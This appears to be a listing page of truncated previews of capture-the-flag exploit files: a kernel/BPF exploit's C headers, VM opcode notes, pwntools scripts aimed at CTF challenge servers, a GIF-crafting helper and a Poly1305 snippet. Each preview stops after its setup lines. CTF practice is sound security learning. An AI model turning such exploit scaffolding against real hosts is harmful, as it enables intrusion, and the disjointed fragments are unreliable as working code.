#define _GNU_SOURCE | |
#include <err.h> | |
#include <stdint.h> | |
#include <linux/bpf.h> | |
#include <linux/filter.h> | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <sys/syscall.h> | |
#include <asm/unistd_64.h> | |
#include <sys/types.h> |
#include <stdio.h> | |
#include <sys/types.h> | |
#include <sys/stat.h> | |
#include <fcntl.h> | |
#include <poll.h> | |
#include <pthread.h> | |
#include <unistd.h> | |
#include <sys/ioctl.h> | |
#include <sys/mman.h> | |
#include <sys/syscall.h> |
// gcc -static -o exploit2 exploit2.c -lpthread | |
// NOTE: compiling using uclibc to get small sized binary | |
#include <stdio.h> | |
#include <sys/types.h> | |
#include <sys/stat.h> | |
#include <fcntl.h> | |
#include <poll.h> | |
#include <pthread.h> | |
#include <unistd.h> | |
#include <sys/ioctl.h> |
opcode: 0xa | |
if al >= 0x20 | |
int3() | |
rdi = eax | |
rsi = (rdi*8 + rdi)*8 | |
rdx = *(0x10400+rsi) | |
*(rdx+0x40) = 1 | |
opcode: 0xb | |
if al >= 0x20 |
from pwn import * | |
import random | |
p = 0 | |
while True: | |
try: | |
# p = process("./blindshot") | |
p = remote("pwn01.chal.ctf.westerns.tokyo", 12463) | |
libc = ELF("./libc-2.31.so", checksec=False) | |
off = 0xb80 | |
off = 0x8 | off << 4 |
from pwn import * | |
from random import randint | |
proc_name = "./tcache_king" | |
context.terminal = "tmux splitw -h -f".split() | |
#p = process(proc_name, env={"LD_PRELOAD":"./libc6_2.31-0ubuntu9_amd64.so"}) | |
p = remote("128.199.157.172", 20978) | |
libc = ELF("./libc6_2.31-0ubuntu9_amd64.so") | |
#p = process(proc_name) | |
#libc = ELF("/opt/glibc2.31/lib/libc.so.6") |
from pwn import * | |
import sys | |
from math import floor, ceil | |
from typing import AnyStr | |
# craft gif: http://giflib.sourceforge.net/whatsinagif/bits_and_bytes.html | |
# Lookup tables between a single-byte `bytes` object and its integer value
# (0-255), and the inverse mapping.
ASCII_TO_INT: dict = {bytes([value]): value for value in range(256)}
INT_TO_ASCII: dict = {value: bytes([value]) for value in range(256)}
from pwn import * | |
context.terminal = "tmux splitw -h -f".split() | |
#p = process("./card") | |
#libc = ELF("/opt/glibc2.31/lib/libc-2.31.so", checksec=False) | |
#libc.off_leak = 3889536 | |
#p = process("./card", env={"LD_PRELOAD":"./libc.so.6"}) | |
p = remote("45.77.72.122", 9777) | |
libc = ELF("./libc.so.6", checksec=False) |
from pwn import * | |
context.terminal = "tmux splitw -h -f".split() | |
#p = process("./card") | |
#libc = ELF("/opt/glibc2.31/lib/libc-2.31.so", checksec=False) | |
#libc.off_leak = 3889536 | |
#p = process("./card", env={"LD_PRELOAD":"./libc.so.6"}) | |
p = remote("45.77.72.122", 9777) | |
libc = ELF("./libc.so.6", checksec=False) |
#!/usr/bin/env python3 | |
import gmpy2 | |
import binascii | |
key = binascii.unhexlify("85:d6:be:78:57:55:6d:33:7f:44:52:fe:42:d5:06:a8:01:03:80:8a:fb:0d:b2:fd:4a:bf:f6:af:41:49:f5:1b".replace(":", "")) | |
def clamp(r):
    """Return *r* masked with the Poly1305 "clamp" constant.

    The mask (0x0ffffffc0ffffffc0ffffffc0fffffff, as in RFC 8439) clears the
    top four bits of each 32-bit word and the low two bits of the upper three
    words of the 128-bit value. Only the masked integer is returned; *r* is
    not modified.
    """
    r_clamp_mask = 0x0FFFFFFC0FFFFFFC0FFFFFFC0FFFFFFF
    return r_clamp_mask & r
def poly_mac(msg, key): |